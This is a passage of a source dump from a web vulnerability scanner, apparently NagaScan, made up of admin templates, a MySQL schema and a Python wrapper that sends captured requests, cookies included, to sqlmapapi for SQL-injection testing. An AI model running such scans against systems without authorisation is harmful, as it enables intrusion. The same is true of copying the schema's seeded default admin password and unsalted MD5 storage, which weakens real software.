 53 |     <div id="div-requests" class="uk-width-1-1" style="display:none">
 54 |         <table class="uk-table uk-table-hover">
 55 |             <thead>
 56 |                 <tr>
 57 |                     <th class="uk-width-1-10">ID</th>
 58 |                     <th class="uk-width-2-10">Time</th>
 59 |                     <th class="uk-width-1-10">Method</th>
 60 |                     <th class="uk-width-1-10">Protocol</th>
 61 |                     <th class="uk-width-1-10">Host</th>
 62 |                     <th class="uk-width-3-10">Status</th>
 63 |                     <th class="uk-width-1-10">View</th>
 64 |                 </tr>
 65 |             </thead>
 66 |             <tbody>
 67 |                 <tr v-repeat="request: requests" >
 68 |                     <td>
 69 |                         <span v-text="request.id"></span>
 70 |                     </td>
 71 |                     <td>
 72 |                         <span v-text="request.update_time"></span>
 73 |                     </td>
 74 |                     <td>
 75 |                         <span v-text="request.method"></span>
 76 |                     </td>
 77 |                     <td>
 78 |                         <span v-text="request.protocol"></span>
 79 |                     </td>
 80 |                     <td>
 81 |                         <!--<span v-model="request.protocol+'://'+request.host+request.path"></span>-->
 82 |                         <span v-model="request.host"></span>
 83 |                     </td>
 84 |                     <td>
 85 |                         <span v-if="request.result_xss=='vulnerable'" class="uk-badge uk-badge-danger">xss: vulnerable</span></dd>
 86 |                         <span v-if="request.result_xss=='not vulnerable'" class="uk-badge uk-badge-success">xss: not vulnerable</span></dd>
 87 |                         <span v-if="request.result_xss=='not scan yet'" class="uk-badge uk-badge-warning">xss: not scan yet</span></dd>
 88 | 
 89 |                         <span v-if="request.result_sqli=='vulnerable'" class="uk-badge uk-badge-danger">sqli: vulnerable</span></dd>
 90 |                         <span v-if="request.result_sqli=='not vulnerable'" class="uk-badge uk-badge-success">sqli: not vulnerable</span></dd>
 91 |                         <span v-if="request.result_sqli=='not scan yet'" class="uk-badge uk-badge-warning">sqli: not scan yet</span></dd>
 92 | 
 93 |                         <span v-if="request.result_fi=='vulnerable'" class="uk-badge uk-badge-danger">fi: vulnerable</span></dd>
 94 |                         <span v-if="request.result_fi=='not vulnerable'" class="uk-badge uk-badge-success">fi: not vulnerable</span></dd>
 95 |                         <span v-if="request.result_fi=='not scan yet'" class="uk-badge uk-badge-warning">fi: not scan yet</span></dd>
 96 |                     </td>
 97 |                     <td>
 98 |                         <a href="#0" v-on="click: view_request(request)"><i class="uk-icon-eye"></i>
 99 |                     </td>
100 |                 </tr>
101 |             </tbody>
102 |         </table>
103 |         <div class="uk-width-1-1 uk-text-center">
104 |             <ul class="uk-pagination">
105 |                 <li v-if="! page.has_previous" class="uk-disabled"><span><i class="uk-icon-angle-double-left"></i></span></li>
106 |                 <li v-if="page.has_previous"><a v-on="click: previous()" href="#0"><i class="uk-icon-angle-double-left"></i></a></li>
107 |                 <li class="uk-active"><span v-text="page.page_index"></span></li>
108 |                 <li v-if="! page.has_next" class="uk-disabled"><span><i class="uk-icon-angle-double-right"></i></span></li>
109 |                 <li v-if="page.has_next"><a v-on="click: next()" href="#0"><i class="uk-icon-angle-double-right"></i></a></li>
110 |             </ul>
111 |         </div>
112 |     </div>
113 | 
114 | 
115 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
116 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
117 |     </div>
118 | {% endblock %}
119 | 


--------------------------------------------------------------------------------
/schema.sql:
--------------------------------------------------------------------------------
  1 | -- init database
  2 | 
  3 | drop database if exists nagascan;
  4 | 
  5 | create database nagascan;
  6 | 
  7 | use nagascan;
  8 | 
  9 | DROP TABLE IF EXISTS `users`;
 10 | create table users (
 11 |     `id` varchar(50) not null,
 12 |     `email` varchar(50) not null,
 13 |     `password` varchar(50) not null,
 14 |     `admin` bool not null,
 15 |     `name` varchar(50) not null,
 16 |     `image` varchar(500) not null,
 17 |     `created_at` real not null,
 18 |     unique key `idx_email` (`email`),
 19 |     key `idx_created_at` (`created_at`),
 20 |     primary key (`id`)
 21 | ) engine=innodb default charset=utf8;
 22 | 
 23 | -- email / password:
 24 | -- nagascan@example.com / Naga5c@n
 25 | 
 26 | insert into users (`id`, `email`, `password`, `admin`, `name`, `image`, `created_at`) values ('0010018336417540987fff4508f43fbaed718e263442526000', 'nagascan@example.com', '1ab3f265aee6b93afa940aa5325035e2', 1, 'Administrator', 'http://avfisher.win/wp-content/uploads/2015/10/avfisher.jpg', 1402909113.628);
 27 | 
 28 | --
 29 | -- Table structure for table `requests`
 30 | --
 31 | 
 32 | DROP TABLE IF EXISTS `requests`;
 33 | CREATE TABLE `requests` (
 34 |   `id` int(32) NOT NULL AUTO_INCREMENT,
 35 |   `rid` varchar(64) DEFAULT NULL,
 36 |   `ip` varchar(40) DEFAULT NULL,
 37 |   `port` varchar(40) DEFAULT NULL,
 38 |   `protocol` varchar(40) DEFAULT NULL,
 39 |   `host` varchar(255) DEFAULT NULL,
 40 |   `method` varchar(40) DEFAULT NULL,
 41 |   `user_agent` text DEFAULT NULL,
 42 |   `accept` varchar(255) DEFAULT NULL,
 43 |   `accept_language` varchar(255) DEFAULT NULL,
 44 |   `accept_encoding` varchar(255) DEFAULT NULL,
 45 |   `cookie` text DEFAULT NULL,
 46 |   `referer` text DEFAULT NULL,
 47 |   `content_type` varchar(255) DEFAULT NULL,
 48 |   `post_data` text DEFAULT NULL,
 49 |   `path` text DEFAULT NULL,
 50 |   `scan_xss` int(4) DEFAULT 0,
 51 |   `scan_sqli` int(4) DEFAULT 0,
 52 |   `scan_fi` int(4) DEFAULT 0,
 53 |   `result_xss` varchar(40) DEFAULT 'not scan yet',
 54 |   `result_sqli` varchar(40) DEFAULT 'not scan yet',
 55 |   `result_fi` varchar(40) DEFAULT 'not scan yet',
 56 |   `poc_xss` text DEFAULT NULL,
 57 |   `poc_sqli` text DEFAULT NULL,
 58 |   `poc_fi` text DEFAULT NULL,
 59 |   `time` varchar(255) DEFAULT NULL,
 60 |   `update_time` varchar(255) DEFAULT NULL,
 61 |   PRIMARY KEY (`id`)
 62 | ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
 63 | 
 64 | --
 65 | -- Table structure for table `responses`
 66 | --
 67 | 
 68 | DROP TABLE IF EXISTS `responses`;
 69 | CREATE TABLE `responses` (
 70 |   `id` int(32) NOT NULL AUTO_INCREMENT,
 71 |   `rid` varchar(64) DEFAULT NULL,
 72 |   `response_xss` longtext DEFAULT NULL,
 73 |   `response_sqli` longtext DEFAULT NULL,
 74 |   `response_fi` longtext DEFAULT NULL,
 75 |   `update_time` varchar(255) DEFAULT NULL,
 76 |   PRIMARY KEY (`id`)
 77 | ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
 78 | 
 79 | --
 80 | -- Table structure for table `exclusions_parse`
 81 | --
 82 | 
 83 | DROP TABLE IF EXISTS `exclusions_parse`;
 84 | CREATE TABLE `exclusions_parse` (
 85 |   `id` int(50) NOT NULL AUTO_INCREMENT,
 86 |   `exclusion` varchar(255) DEFAULT NULL,
 87 |   `update_time` varchar(255) DEFAULT NULL,
 88 |   PRIMARY KEY (`id`)
 89 | ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
 90 | 
 91 | 
 92 | insert into exclusions_parse (`id`) values (1);
 93 | 
 94 | --
 95 | -- Table structure for table `exclusions_cookie`
 96 | --
 97 | 
 98 | DROP TABLE IF EXISTS `exclusions_cookie`;
 99 | CREATE TABLE `exclusions_cookie` (
100 |   `id` int(50) NOT NULL AUTO_INCREMENT,
101 |   `exclusion` text DEFAULT NULL,
102 |   `update_time` varchar(255) DEFAULT NULL,
103 |   PRIMARY KEY (`id`)
104 | ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
105 | 
106 | 
107 | insert into exclusions_cookie (`id`) values (1);
108 | 
109 | --
110 | -- Table structure for table `exclusions_scan`
111 | --
112 | 
113 | DROP TABLE IF EXISTS `exclusions_scan`;
114 | CREATE TABLE `exclusions_scan` (
115 |   `id` int(50) NOT NULL AUTO_INCREMENT,
116 |   `type` int(4) DEFAULT NULL, -- 0: scan_xss; 1: scan_sqli; 2: scan_fi
117 |   `ip` varchar(40) DEFAULT NULL,
118 |   `port` varchar(40) DEFAULT NULL,
119 |   `protocol` varchar(40) DEFAULT NULL,
120 |   `host` varchar(255) DEFAULT NULL,
121 |   `method` varchar(40) DEFAULT NULL,
122 |   `user_agent` text DEFAULT NULL,
123 |   `accept` varchar(255) DEFAULT NULL,
124 |   `accept_language` varchar(255) DEFAULT NULL,
125 |   `accept_encoding` varchar(255) DEFAULT NULL,
126 |   `cookie` text DEFAULT NULL,
127 |   `referer` text DEFAULT NULL,
128 |   `content_type` varchar(255) DEFAULT NULL,
129 |   `post_data` text DEFAULT NULL,
130 |   `path` text DEFAULT NULL,
131 |   `update_time` varchar(255) DEFAULT NULL,
132 |   PRIMARY KEY (`id`)
133 | ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
134 | 
135 | insert into exclusions_scan (`id`, `type`) values (1, 0);
136 | insert into exclusions_scan (`id`, `type`) values (2, 1);
137 | insert into exclusions_scan (`id`, `type`) values (3, 2);
138 | 
139 |   --
140 |   -- Table structure for table `sqlmap`
141 |   --
142 | 
143 |   DROP TABLE IF EXISTS `sqlmap`;
144 |   CREATE TABLE `sqlmap` (
145 |     `id` varchar(50) not null,
146 |     `ip` varchar(40) DEFAULT NULL,
147 |     `port` varchar(40) DEFAULT NULL,
148 |     `status` int(4) DEFAULT 1, -- 2: not available; 1: available
149 |     `update_time` varchar(255) DEFAULT NULL,
150 |     PRIMARY KEY (`id`)
151 |   ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;
152 | 


--------------------------------------------------------------------------------
/scanner/lib/hack_sqlmapapi.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ SQLMap API Operations
  4 | 
  5 | This module is used to call sqlmapapi to check sql injection.
  6 | 
  7 | """
  8 | 
  9 | import json
 10 | import requests
 11 | import time
 12 | from lib.utils import highlight
 13 | from threading import Thread
 14 | 
 15 | 
 16 | TIME_OUT = 30
 17 | class HackSqlmapApi(Thread):
 18 |     def __init__(self, server, request_info):
 19 |         Thread.__init__(self)
 20 |         self.server = server
 21 |         if self.server[-1] != '/':
 22 |             self.server = self.server + '/'
 23 |         self.request_info = request_info
 24 |         self.target = "{}://{}{}".format(self.request_info['protocol'], self.request_info['host'], self.request_info['path'])
 25 |         self.taskid = ''
 26 |         self.engineid = ''
 27 |         self.status = ''
 28 |         self.start_time = time.time()
 29 | 
 30 |     def task_new(self):
 31 |         url = "{}task/new".format(self.server)
 32 |         res = json.loads(requests.get(url, timeout = TIME_OUT).text)
 33 |         if res['success']:
 34 |             self.taskid = res['taskid']
 35 |             print highlight('[*] created new task: {}'.format(self.taskid), 'green')
 36 |             print '\t[-]target: {}'.format(self.target)
 37 |             return True
 38 |         else:
 39 |             return False
 40 | 
 41 |     def task_delete(self):
 42 |         url = "{}task/{}/delete".format(self.server, self.taskid)
 43 |         res = json.loads(requests.get(url, timeout = TIME_OUT).text)
 44 |         if res['success']:
 45 |             print highlight('[*] deleted task: {}'.format(self.taskid), 'green')
 46 |             return True
 47 |         else:
 48 |             print highlight('[!] invalid task: {}'.format(self.taskid), 'yellow')
 49 |             return False
 50 | 
 51 |     def scan_start(self):
 52 |         url = "{}scan/{}/start".format(self.server, self.taskid)
 53 |         headers = {'Content-Type': 'application/json'}
 54 |         payload = {'url': self.target,
 55 |                   'data': self.request_info['post_data'],
 56 |                   'cookie': self.request_info['cookie'],
 57 |                   'referer': self.request_info['referer'],
 58 |                   'user-agent': self.request_info['user_agent']}
 59 |         print '\t[-]payload: {}'.format(payload)
 60 |         res = json.loads(requests.post(url, data = json.dumps(payload), headers = headers, timeout = TIME_OUT).text)
 61 |         if res['success']:
 62 |             self.engineid = res['engineid']
 63 |             return True
 64 |         return False
 65 | 
 66 |     def scan_status(self):
 67 |         url = "{}scan/{}/status".format(self.server, self.taskid)
 68 |         res = json.loads(requests.get(url, timeout = TIME_OUT).text)
 69 |         if res['success']:
 70 |             self.status = res['status']
 71 |             if self.status == 'running':
 72 |                 return 'running'
 73 |             elif self.status == 'terminated':
 74 |                 return 'terminated'
 75 |             else:
 76 |                 return 'error'
 77 |         else:
 78 |             return 'error'
 79 | 
 80 |     def scan_data(self):
 81 |         url = "{}scan/{}/data".format(self.server, self.taskid)
 82 |         res = json.loads(requests.get(url, timeout = TIME_OUT).text)
 83 |         if res['success']:
 84 |             self.data = res['data']
 85 |             if len(self.data) == 0:
 86 |                 print highlight('[*] not injection!!!', 'red')
 87 |             else:
 88 |                 print highlight('[*] injection found:', 'blue')
 89 |                 print '\t[-]result: {}'.format(self.data)
 90 |         else:
 91 |             print highlight('[!] invalid scan!!!', 'yellow')
 92 | 
 93 |     def option_set(self):
 94 |         url = "{}option/{}/set".format(self.server, self.taskid)
 95 |         headers = {'Content-Type': 'application/json'}
 96 |         option = {"options": {
 97 |                     "smart": True,
 98 |                     }
 99 |                  }
100 |         res = json.loads(requests.post(url, data = json.dumps(option), headers = headers, timeout = TIME_OUT).text)
101 | 
102 |     def scan_stop(self):
103 |         url = "{}scan/{}/stop".format(self.server, self.taskid)
104 |         res = json.loads(requests.get(url, timeout = TIME_OUT).text)
105 |         if res['success']:
106 |             return True
107 |         return False
108 | 
109 |     def scan_kill(self):
110 |         url = "{}scan/{}/kill".format(self.server, self.taskid)
111 |         res = json.loads(requests.get(url, timeout = TIME_OUT).text)
112 |         if res['success']:
113 |             return True
114 |         return False
115 | 
116 |     def run(self):
117 |         if not self.task_new():
118 |             return False
119 |         self.option_set()
120 |         if not self.scan_start():
121 |             return False
122 |         while True:
123 |             if self.scan_status() == 'running':
124 |                 time.sleep(10)
125 |             elif self.scan_status() == 'terminated':
126 |                 break
127 |             else:
128 |                 break
129 |             print '\t[-] scan time: {}'.format(time.time() - self.start_time)
130 |             if time.time() - self.start_time > 3000:
131 |                 error = True
132 |                 self.scan_stop()
133 |                 self.scan_kill()
134 |                 break
135 |         self.scan_data()
136 |         self.task_delete()
137 |         print highlight('[*] total scan time: {}'.format(time.time() - self.start_time), 'green')
138 | 


--------------------------------------------------------------------------------
/www/templates/manage_scan_add.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}
  4 | Scan Options-
  5 | {% if type == 'sqlmap' %}SQLMAP Servers
  6 | {% else %}Unknown
  7 | {% endif %}
  8 | {% endblock %}
  9 | 
 10 | {% block beforehead %}
 11 | 
 12 | <script>
 13 | 
 14 | var url = '{{ url }}';
 15 | var type = '{{ type }}';
 16 | 
 17 | $(function() {
 18 |   $('#div-loading').hide();
 19 |   $('#update_success').hide();
 20 |   $('#update_failed').hide();
 21 |   $('#form-sqlmap').show();
 22 |   var vm = new Vue({
 23 |       el: '#form-sqlmap',
 24 |       data: {
 25 |           ip: '',
 26 |           port: '',
 27 |           status: '',
 28 |           type: type,
 29 |       },
 30 |       methods: {
 31 |           submit: function (event) {
 32 |               event.preventDefault();
 33 |               startLoading();
 34 |               postApi(url, {ip: this.ip, port: this.port, status: this.status, }, function (err, r) {
 35 |                   if (err) {
 36 |                       showError(err);
 37 |                       $('#error_alert').show();
 38 |                       setTimeout("$('#error_alert').hide()", 3000);
 39 |                   }
 40 |                   else {
 41 |                       if (r.result=='success'){
 42 |                           $('#update_success').show();
 43 |                           setTimeout("$('#update_success').hide()", 3000);
 44 |                           return location.assign('/manage/scan/sqlmap/view');
 45 |                       }
 46 |                       if (r.result=='failed'){
 47 |                           $('#update_failed').show();
 48 |                           setTimeout("$('#update_success').hide()", 3000);
 49 |                       }
 50 |                   }
 51 |                   stopLoading();
 52 |               });
 53 | 
 54 |           }
 55 |       }
 56 |   });
 57 | });
 58 | 
 59 | </script>
 60 | 
 61 | {% endblock %}
 62 | 
 63 | {% block content %}
 64 | 
 65 |     <div class="uk-width-1-1">
 66 |         <div class="uk-container uk-container-center">
 67 |             <div data-uk-grid-margin="" class="uk-grid">
 68 |                 <div class="tm-sidebar uk-width-medium-1-4 uk-hidden-small uk-row-first">
 69 |                     <ul data-uk-nav="" class="tm-nav uk-nav">
 70 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Exclusions</li>
 71 |                         <li><a href="/manage/exclusions/parse/view">Log Parse</a></li>
 72 |                         <li><a href="/manage/exclusions/cookie/view">Cookie Parameter</a></li>
 73 |                         <li><a href="/manage/exclusions/xss/view">XSS Scan</a></li>
 74 |                         <li><a href="/manage/exclusions/sqli/view">SQLi Scan</a></li>
 75 | 
 76 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Scan Options</li>
 77 |                         <li><a href="/manage/scan/sqlmap/view">SQLMAP Servers</a></li>
 78 | 
 79 |                         <li class="uk-nav-header uk-text-large uk-text-bold">System Options</li>
 80 |                         <li><a href="grid.html">SMTP</a></li>
 81 |                     </ul>
 82 |                 </div>
 83 |                 <div class="tm-main uk-width-medium-3-4">
 84 |                     <form id="form-sqlmap" v-on="submit: submit" class="uk-form uk-form-stacked">
 85 |                         <div id="error_alert" class="uk-width-1-1"><div class="uk-alert uk-alert-danger uk-hidden"></div></div>
 86 |                         <div id="update_success" class="uk-alert uk-alert-success" style="display:none"><a href="" class="uk-alert-close uk-close"></a><p>Add Success</p></div>
 87 |                         <div id="update_failed" class="uk-alert uk-alert-warning" style="display:none"><a href="" class="uk-alert-close uk-close"></a><p>Add Failed</p></div>
 88 |                         <h1 v-if="type=='sqlmap'" class="uk-text-large uk-text-bold">SQLMAP Servers</h1>
 89 |                         <p class="uk-text-warning">Please follow below requirements to add SQLMAP server.</p>
 90 |                         <div class="uk-form-row">
 91 |                             <label class="uk-form-label">IP:</label>
 92 |                             <div class="uk-form-controls">
 93 |                                 <input v-model="ip" name="ip" type="text" class="uk-width-1-1">
 94 |                             </div>
 95 |                         </div>
 96 |                         <div class="uk-form-row">
 97 |                             <label class="uk-form-label">Port: <span class="uk-text-small uk-text-success">(Range：1-65535)</span></label>
 98 |                             <div class="uk-form-controls">
 99 |                                 <input v-model="port" name="port" type="text" class="uk-width-1-1">
100 |                             </div>
101 |                         </div>
102 |                         <div class="uk-form-row">
103 |                             <label class="uk-form-label">Status: <span class="uk-text-small uk-text-success">(1: Avaliable；2: Unavaliable)</span></label>
104 |                             <div class="uk-form-controls">
105 |                                 <input v-model="status" name="status" type="text" class="uk-width-1-1">
106 |                             </div>
107 |                         </div>
108 |                         <div class="uk-form-row uk-text-center">
109 |                             <br/><button type="submit" class="uk-button uk-button-primary"><i class="uk-icon-save"></i> Save</button>
110 |                             <a href="/manage/scan/sqlmap/view" class="uk-button uk-button-success"><i class="uk-icon-undo"></i> Return</a>
111 |                         </div>
112 |                     </form>
113 |                 </div>
114 |             </div>
115 |         </div>
116 |     </div>
117 | 
118 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
119 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
120 |     </div>
121 | {% endblock %}
122 | 


--------------------------------------------------------------------------------
/www/templates/manage_scan_edit.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}
  4 | Scan Options-
  5 | {% if type == 'sqlmap' %}SQLMAP Servers
  6 | {% else %}Unknown
  7 | {% endif %}
  8 | {% endblock %}
  9 | 
 10 | {% block beforehead %}
 11 | 
 12 | <script>
 13 | 
 14 | var url = '{{ url }}';
 15 | 
 16 | function initVM(data) {
 17 |     $('#form-sqlmap').show();
 18 |     var vm = new Vue({
 19 |         el: '#form-sqlmap',
 20 |         data: {
 21 |             sqlmap: data.sqlmap[0],
 22 |             type: data.type,
 23 |             id: data.id,
 24 |         },
 25 |         methods: {
 26 |             submit: function (event) {
 27 |                 event.preventDefault();
 28 |                 startLoading();
 29 |                 postApi('/api/scan/'+this.type+'/'+this.id+'/update', this.sqlmap, function (err, r) {
 30 |                     if (err) {
 31 |                         showError(err);
 32 |                         $('#error_alert').show();
 33 |                         setTimeout("$('#error_alert').hide()", 3000);
 34 |                     }
 35 |                     else {
 36 |                         if (r.result=='success'){
 37 |                             $('#update_success').show();
 38 |                             setTimeout("$('#update_success').hide()", 3000);
 39 |                             return location.assign('/manage/scan/sqlmap/view');
 40 |                         }
 41 |                         if (r.result=='failed'){
 42 |                             $('#update_failed').show();
 43 |                             setTimeout("$('#update_success').hide()", 3000);
 44 |                         }
 45 |                     }
 46 |                     stopLoading();
 47 |                 });
 48 | 
 49 |             }
 50 |         }
 51 |     });
 52 | }
 53 | 
 54 | $(function() {
 55 |     getApi(url, function (err, results) {
 56 |         if (err) {
 57 |             return showError(err);
 58 |         }
 59 |         $('#div-loading').hide();
 60 |         $('#update_success').hide();
 61 |         $('#update_failed').hide();
 62 |         initVM(results);
 63 |     });
 64 | });
 65 | 
 66 | </script>
 67 | 
 68 | {% endblock %}
 69 | 
 70 | {% block content %}
 71 | 
 72 |     <div class="uk-width-1-1">
 73 |         <div class="uk-container uk-container-center">
 74 |             <div data-uk-grid-margin="" class="uk-grid">
 75 |                 <div class="tm-sidebar uk-width-medium-1-4 uk-hidden-small uk-row-first">
 76 |                     <ul data-uk-nav="" class="tm-nav uk-nav">
 77 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Exclusions</li>
 78 |                         <li><a href="/manage/exclusions/parse/view">Log Parse</a></li>
 79 |                         <li><a href="/manage/exclusions/cookie/view">Cookie Parameter</a></li>
 80 |                         <li><a href="/manage/exclusions/xss/view">XSS Scan</a></li>
 81 |                         <li><a href="/manage/exclusions/sqli/view">SQLi Scan</a></li>
 82 | 
 83 |                         <li class="uk-nav-header uk-text-large uk-text-bold">Scan Options</li>
 84 |                         <li><a href="/manage/scan/sqlmap/view">SQLMAP Servers</a></li>
 85 | 
 86 |                         <li class="uk-nav-header uk-text-large uk-text-bold">System Options</li>
 87 |                         <li><a href="grid.html">SMTP</a></li>
 88 |                     </ul>
 89 |                 </div>
 90 |                 <div class="tm-main uk-width-medium-3-4">
 91 |                     <form id="form-sqlmap" v-on="submit: submit" class="uk-form uk-form-stacked">
 92 |                         <div id="error_alert" class="uk-width-1-1"><div class="uk-alert uk-alert-danger uk-hidden"></div></div>
 93 |                         <div id="update_success" class="uk-alert uk-alert-success" style="display:none"><a href="" class="uk-alert-close uk-close"></a><p>Update Success</p></div>
 94 |                         <div id="update_failed" class="uk-alert uk-alert-warning" style="display:none"><a href="" class="uk-alert-close uk-close"></a><p>Update Failed</p></div>
 95 |                         <h1 v-if="type=='sqlmap'" class="uk-text-large uk-text-bold">SQLMAP Servers</h1>
 96 |                         <div class="uk-form-row">
 97 |                             <label class="uk-form-label">IP:</label>
 98 |                             <div class="uk-form-controls">
 99 |                                 <input v-model="sqlmap.ip" name="ip" type="text" class="uk-width-1-1">
100 |                             </div>
101 |                         </div>
102 |                         <div class="uk-form-row">
103 |                             <label class="uk-form-label">Port: <span class="uk-text-small uk-text-success">(Range：1-65535)</span></label>
104 |                             <div class="uk-form-controls">
105 |                                 <input v-model="sqlmap.port" name="port" type="text" class="uk-width-1-1">
106 |                             </div>
107 |                         </div>
108 |                         <div class="uk-form-row">
109 |                             <label class="uk-form-label">Status: <span class="uk-text-small uk-text-success">(1: Avaliable；2: Unavaliable)</span></label>
110 |                             <div class="uk-form-controls">
111 |                                 <input v-model="sqlmap.status" name="status" type="text" class="uk-width-1-1">
112 |                             </div>
113 |                         </div>
114 |                         <div class="uk-form-row uk-text-center">
115 |                             <br/><button type="submit" class="uk-button uk-button-primary"><i class="uk-icon-save"></i> Save</button>
116 |                             <a href="/manage/scan/sqlmap/view" class="uk-button uk-button-success"><i class="uk-icon-undo"></i> Return</a>
117 |                         </div>
118 |                     </form>
119 |                 </div>
120 |             </div>
121 |         </div>
122 |     </div>
123 | 
124 |     <div id="div-loading" class="uk-width-1-1 uk-text-center">
125 |         <span><i class="uk-icon-spinner uk-icon-medium uk-icon-spin"></i> Loading...</span>
126 |     </div>
127 | {% endblock %}
128 | 


--------------------------------------------------------------------------------
/www/static/js/md5.js:
--------------------------------------------------------------------------------
 1 | /*
 2 | CryptoJS v3.1.2
 3 | code.google.com/p/crypto-js
 4 | (c) 2009-2013 by Jeff Mott. All rights reserved.
 5 | code.google.com/p/crypto-js/wiki/License
 6 | */
 7 | var CryptoJS=CryptoJS||function(s,p){var m={},l=m.lib={},n=function(){},r=l.Base={extend:function(b){n.prototype=this;var h=new n;b&&h.mixIn(b);h.hasOwnProperty("init")||(h.init=function(){h.$super.init.apply(this,arguments)});h.init.prototype=h;h.$super=this;return h},create:function(){var b=this.extend();b.init.apply(b,arguments);return b},init:function(){},mixIn:function(b){for(var h in b)b.hasOwnProperty(h)&&(this[h]=b[h]);b.hasOwnProperty("toString")&&(this.toString=b.toString)},clone:function(){return this.init.prototype.extend(this)}},
 8 | q=l.WordArray=r.extend({init:function(b,h){b=this.words=b||[];this.sigBytes=h!=p?h:4*b.length},toString:function(b){return(b||t).stringify(this)},concat:function(b){var h=this.words,a=b.words,j=this.sigBytes;b=b.sigBytes;this.clamp();if(j%4)for(var g=0;g<b;g++)h[j+g>>>2]|=(a[g>>>2]>>>24-8*(g%4)&255)<<24-8*((j+g)%4);else if(65535<a.length)for(g=0;g<b;g+=4)h[j+g>>>2]=a[g>>>2];else h.push.apply(h,a);this.sigBytes+=b;return this},clamp:function(){var b=this.words,h=this.sigBytes;b[h>>>2]&=4294967295<<
 9 | 32-8*(h%4);b.length=s.ceil(h/4)},clone:function(){var b=r.clone.call(this);b.words=this.words.slice(0);return b},random:function(b){for(var h=[],a=0;a<b;a+=4)h.push(4294967296*s.random()|0);return new q.init(h,b)}}),v=m.enc={},t=v.Hex={stringify:function(b){var a=b.words;b=b.sigBytes;for(var g=[],j=0;j<b;j++){var k=a[j>>>2]>>>24-8*(j%4)&255;g.push((k>>>4).toString(16));g.push((k&15).toString(16))}return g.join("")},parse:function(b){for(var a=b.length,g=[],j=0;j<a;j+=2)g[j>>>3]|=parseInt(b.substr(j,
10 | 2),16)<<24-4*(j%8);return new q.init(g,a/2)}},a=v.Latin1={stringify:function(b){var a=b.words;b=b.sigBytes;for(var g=[],j=0;j<b;j++)g.push(String.fromCharCode(a[j>>>2]>>>24-8*(j%4)&255));return g.join("")},parse:function(b){for(var a=b.length,g=[],j=0;j<a;j++)g[j>>>2]|=(b.charCodeAt(j)&255)<<24-8*(j%4);return new q.init(g,a)}},u=v.Utf8={stringify:function(b){try{return decodeURIComponent(escape(a.stringify(b)))}catch(g){throw Error("Malformed UTF-8 data");}},parse:function(b){return a.parse(unescape(encodeURIComponent(b)))}},
11 | g=l.BufferedBlockAlgorithm=r.extend({reset:function(){this._data=new q.init;this._nDataBytes=0},_append:function(b){"string"==typeof b&&(b=u.parse(b));this._data.concat(b);this._nDataBytes+=b.sigBytes},_process:function(b){var a=this._data,g=a.words,j=a.sigBytes,k=this.blockSize,m=j/(4*k),m=b?s.ceil(m):s.max((m|0)-this._minBufferSize,0);b=m*k;j=s.min(4*b,j);if(b){for(var l=0;l<b;l+=k)this._doProcessBlock(g,l);l=g.splice(0,b);a.sigBytes-=j}return new q.init(l,j)},clone:function(){var b=r.clone.call(this);
12 | b._data=this._data.clone();return b},_minBufferSize:0});l.Hasher=g.extend({cfg:r.extend(),init:function(b){this.cfg=this.cfg.extend(b);this.reset()},reset:function(){g.reset.call(this);this._doReset()},update:function(b){this._append(b);this._process();return this},finalize:function(b){b&&this._append(b);return this._doFinalize()},blockSize:16,_createHelper:function(b){return function(a,g){return(new b.init(g)).finalize(a)}},_createHmacHelper:function(b){return function(a,g){return(new k.HMAC.init(b,
13 | g)).finalize(a)}}});var k=m.algo={};return m}(Math);
14 | (function(s){function p(a,k,b,h,l,j,m){a=a+(k&b|~k&h)+l+m;return(a<<j|a>>>32-j)+k}function m(a,k,b,h,l,j,m){a=a+(k&h|b&~h)+l+m;return(a<<j|a>>>32-j)+k}function l(a,k,b,h,l,j,m){a=a+(k^b^h)+l+m;return(a<<j|a>>>32-j)+k}function n(a,k,b,h,l,j,m){a=a+(b^(k|~h))+l+m;return(a<<j|a>>>32-j)+k}for(var r=CryptoJS,q=r.lib,v=q.WordArray,t=q.Hasher,q=r.algo,a=[],u=0;64>u;u++)a[u]=4294967296*s.abs(s.sin(u+1))|0;q=q.MD5=t.extend({_doReset:function(){this._hash=new v.init([1732584193,4023233417,2562383102,271733878])},
15 | _doProcessBlock:function(g,k){for(var b=0;16>b;b++){var h=k+b,w=g[h];g[h]=(w<<8|w>>>24)&16711935|(w<<24|w>>>8)&4278255360}var b=this._hash.words,h=g[k+0],w=g[k+1],j=g[k+2],q=g[k+3],r=g[k+4],s=g[k+5],t=g[k+6],u=g[k+7],v=g[k+8],x=g[k+9],y=g[k+10],z=g[k+11],A=g[k+12],B=g[k+13],C=g[k+14],D=g[k+15],c=b[0],d=b[1],e=b[2],f=b[3],c=p(c,d,e,f,h,7,a[0]),f=p(f,c,d,e,w,12,a[1]),e=p(e,f,c,d,j,17,a[2]),d=p(d,e,f,c,q,22,a[3]),c=p(c,d,e,f,r,7,a[4]),f=p(f,c,d,e,s,12,a[5]),e=p(e,f,c,d,t,17,a[6]),d=p(d,e,f,c,u,22,a[7]),
